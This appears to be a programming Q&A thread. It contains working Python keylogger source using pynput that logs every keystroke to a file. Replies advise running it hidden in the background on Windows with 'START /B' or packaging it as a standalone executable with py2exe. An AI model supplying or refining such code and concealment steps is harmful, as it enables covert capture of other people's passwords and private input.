# how Always listen to keylogger?

Tags: python, python-3.x, windows, keylogger

How do I always listen? When Pycharm closes the script turns off. i use windows

```
from pynput.keyboard import Key, Listener
import logging

log_dir=""
logging.basicConfig(filename=(log_dir + "key_log.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()
```

I issued an order, made no mistake but it is not in the process

Comment: you need to run the script from the command line instead: `python mykeylogger.py`

Comment: @lucidbrot Also add `&` at the end of the command to ensure that it runs in background even when the terminal is closed down. Edit: Not sure if `&` works in Windows

Comment: @Raj how? python myscript.py & ?

Comment: @lucidbrot I want it to be in the background procces. Without my startup

Comment: @koki Yes `python myscript.py &` should work on any Linux system. Not sure about Windows.

Comment: @Raj but i use windows

Answer (score 3, accepted):

I would suggest building a standalone Windows executable from your script with a tool like `py2exe`, since requiring the python interpreter to run a keylogger would add a cumbersome dependency to it.

Or you could invoke the python interpreter and run it as a background process from the Windows command line CMD :

```
START /B python <your_python_file>.py
```

Comment: can't open file 'employee.py': [Errno 2] No such file or directory.
When I run this command Should I be in the directory where I have the file?

Comment: You need to make sure that you are in the python's file directory before executing the command line.

Comment: Or you could indicate its absolute path

Comment: ModuleNotFoundError: No module named 'pynput'.
why? When I run in pycharm it works

Comment: Make sure you use the same interpreter in pycharm and in the command line too, as the module you try to use might not be installed for both

Comment: I issued an order, made no mistake but it is not in the process

Answer (score 0):

You need to run the file and keep it open. The easiest way is from the command line (note: you need to cd to the directory with your python file):

```
python <nameOfYourFile>.py
```

hit return, dont close the command line.

Comment: I want it to be in the background procces

Comment: You may need to convert it to a .exe file [look here](https://stackoverflow.com/questions/783531/how-to-run-a-python-script-in-the-background)